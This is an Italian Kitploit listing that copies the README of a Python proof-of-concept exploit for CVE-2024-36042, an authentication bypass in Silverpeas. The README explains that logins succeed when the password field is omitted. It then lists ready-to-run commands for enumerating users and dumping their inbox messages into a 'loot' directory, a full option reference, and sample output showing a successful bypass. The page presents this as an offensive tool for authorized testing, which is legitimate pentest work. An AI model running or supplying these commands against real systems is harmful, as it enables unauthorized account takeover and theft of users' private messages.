Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Silverpeas-AuthBypass-CVE-2024-36042 — PoC in Python per il bypass dell'autenticazione CVE-2024-36042 in Silverpeas < 6.3.5. Include rilevamento della versione, enumerazione multi-thread degli utenti, estrazione dei messaggi e report strutturati per test di sicurezza autorizzati. | Kitploit
Strumenti/GitHubGitHub/ha5ant/silverpeas-authbypass-cve-2024-36042
Autenticazione e AutorizzazioneRicognizioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingRed Teaming

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
ha5ant/silverpeas-authbypass-cve-2024-36042

Silverpeas-AuthBypass-CVE-2024-36042

PoC in Python per il bypass dell'autenticazione CVE-2024-36042 in Silverpeas < 6.3.5. Include rilevamento della versione, enumerazione multi-thread degli utenti, estrazione dei messaggi e report strutturati per test di sicurezza autorizzati.

Vedi Repository
3 mesi faNon ancora revisionato

Silverpeas-AuthBypass-CVE-2024-36042

Un proof-of-concept Python3 pulito e di livello professionale per CVE-2024-36042 — un bypass dell'autenticazione in Silverpeas < 6.3.5 causato dalla mancata validazione della password in AuthenticationServlet.

Python 3.8+ License: MIT


Panoramica

Silverpeas AuthenticationServlet accetta una richiesta di login anche quando il parametro Password è omesso dal corpo POST, concedendo l'accesso a una sessione autenticata per qualsiasi nome utente noto. Questo strumento dimostra la vulnerabilità in modo responsabile attraverso un framework di exploit modulare e multithread con ricognizione avanzata, estrazione di dati e generazione di report professionali.

Versioni vulnerabili: Silverpeas < 6.3.5
CVE: CVE-2024-36042
GHSA: GHSA-qvh3-8c57-gp4m


Funzionalità


Installazione

root@kitploit:~
git clone https://github.com/YOURNAME/Silverpeas-AuthBypass-CVE-2024-36042.git
cd Silverpeas-AuthBypass-CVE-2024-36042
pip install requests beautifulsoup4

Utilizzo

Test rapido (elenco utenti integrato)

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 --dump-messages

Report avanzato (Markdown + Console)

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 -u admin --dump-messages --message-output both

Esportazione forense (file individuali per messaggio)

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 --userlist users.txt --dump-messages --message-output files --output-format md --outdir ./loot

Solo controllo versione (nessuno sfruttamento)

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 --check-version --no-exploit

Tramite proxy con logging HTML grezzo

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 --proxy http://127.0.0.1:8080 --dump-messages --save-raw-html

Gestione dell'output

Lo strumento supporta quattro modalità di output principali per i messaggi scaricati tramite --message-output:

  1. console (predefinita): stampa i messaggi puliti direttamente nel terminale con evidenziazione delle parole chiave.
  2. markdown: genera un report {username}_messages.md per account nella directory di output.
  3. files: crea una cartella per account e salva ogni messaggio come file individuale (es. message_0006.md) con ID riempiti con zeri per un ordinamento pulito del filesystem.
  4. both: combina le modalità console e markdown.

Struttura degli artefatti

root@kitploit:~
outdir/
├── SilverAdmin/
│   ├── message_0001.md
│   ├── message_0002.md
│   ├── raw/ (optional: --save-raw-html)
│   │   └── msg_1.html
│   └── session_cookies.txt
├── scr1ptkiddy/
│   ├── messages.md
│   └── session_cookies.txt
└── summary.json

Riferimento CLI

root@kitploit:~
-t, --target        Base URL of Silverpeas (required)
-u, --user          Single username to target
--userlist          File with one username per line
--dump-messages     Scrape and display inbox messages
--max-id            Max message ID to check (default: 50)
--threads           Concurrent workers (default: 5)
--proxy             HTTP proxy URL
--message-output    Output mode: {console, markdown, files, both}
--output-format     File format: {md, txt}
--json              Export full JSON report
--csv               Export CSV of scraped messages
--outdir            Output directory for exports
--no-color          Disable ANSI color output (useful for logs)
--save-raw-html     Save original HTML responses for debugging
--check-version     Fingerprint version only
--no-exploit        Skip exploitation (pair with --check-version)
--quiet, -q         Minimal output
--no-banner         Suppress banner

Esempio di output

root@kitploit:~
[*] Target   : http://10.49.169.44:8080
[*] Version  : 6.3.1
[+] Version 6.3.1 < 6.3.5 - vulnerable.

[*] Trying: scr1ptkiddy
[+] BYPASSED -> scr1ptkiddy
[+] Data saved to ./scr1ptkiddy

────────────────────────────────────────────────────────────────────
  Execution Summary
────────────────────────────────────────────────────────────────────
┌───────────────┬──────────┬──────────┐
│ Account       │ Status   │ Messages │
├───────────────┼──────────┼──────────┤
│ scr1ptkiddy   │ SUCCESS  │ 6        │
│ admin         │ FAILED   │ 0        │
└───────────────┴──────────┴──────────┘

[+] JSON report -> ./report_20260516_013210.json

Perché esiste

Questo repository fa parte del mio portfolio di sicurezza offensiva. Dimostra:

  • Traduzione della ricerca sulle vulnerabilità — convertire un CVE divulgato in un exploit funzionante e affidabile.
  • Strumentazione di alta qualità — gestione robusta degli errori, supporto multilingue e gestione strutturata dell'output.
  • Consapevolezza operativa — multithreading, supporto proxy e logica di deduplicazione per ambienti realistici.
  • Ingegneria professionale — architettura del codice pulita, documentazione completa e attenzione all'esperienza dell'operatore (UX).

Dichiarazione di non responsabilità

Questo strumento è fornito esclusivamente per test di sicurezza autorizzati, ricerca e scopi educativi. L'accesso non autorizzato a sistemi informatici è illegale. Ottieni sempre un permesso esplicito prima di testare qualsiasi infrastruttura che non possiedi.


Licenza

MIT

Scarica lo strumento
FunzionalitàDescrizione
Rilevamento versioneIdentifica la versione di Silverpeas e lo stato di vulnerabilità prima dell'exploit.
MultithreadEnumerazione utenti concorrente tramite ThreadPoolExecutor con output thread-safe.
Scoperta avanzataScoperta degli endpoint multilingue (inglese/francese) con probing multi-ID.
Estrazione datiDump dei messaggi ad alta fedeltà con deduplicazione e filtraggio del boilerplate.
Output flessibileSupporto per console, report Markdown ed esportazione di singoli file (.md o .txt).
Proxy e debugInstradamento tramite Burp/ZAP (--proxy) e salvataggio dell'HTML grezzo per il debug del parser.
UX pulitaTabelle riepilogative ASCII, evidenziazione delle parole chiave e controllo opzionale dei colori ANSI.